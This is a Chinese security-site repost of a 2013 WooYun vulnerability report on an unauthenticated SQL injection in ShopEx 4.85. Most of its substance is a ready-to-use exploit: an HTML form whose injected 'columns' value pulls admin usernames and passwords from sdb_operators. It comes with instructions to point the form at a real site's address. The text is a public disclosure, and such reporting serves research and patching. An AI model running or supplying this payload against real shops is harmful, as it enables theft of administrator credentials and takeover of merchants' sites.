热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

ShopEx4.85最新版本SQL注入 EXP

发布时间:2013-10-29 09:21文章来源:wooyun文章作者:hawkish001 点击次数:
摘要:漏洞作者: hawkish001 提交时间: 2013-07-29 23:24 公开时间: 2013-10-27 23:24 漏洞类型: SQL注射漏洞 简要描述: ShopEx4.85最新版本SQL注入,无需登录,过GPC,可直接查询管理员密码并回显 详细说明: 啥都不说了,直接上利用代码,将下面的html另存...

漏洞作者: hawkish001

提交时间: 2013-07-29 23:24
公开时间: 2013-10-27 23:24

漏洞类型: SQL注射漏洞
简要描述:

ShopEx4.85最新版本SQL注入,无需登录,过GPC,可直接查询管理员密码并回显
详细说明:

啥都不说了,直接上利用代码,将下面的html另存为一个html文件,修改localhost部分为站点的真实地址:

 

<form method='post' action='http://www.yunsec.net/shopex4.85/api.php?act=search_dly_type&api_version=1.0'>

columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1) as name' name='columns' style='width:80%'/><br />

<input type='submit' value='submit' /><br />

</form>

<script>

//document.forms[0].submit()

</script> 

 

漏洞证明:

ShopEx4.85最新版本SQL注入 EXP

 

标签分类:

上一篇:JEEBBS v3.0(最新版)漏洞几则
下一篇:phpmps_v2.3最新版两处SQL注入漏洞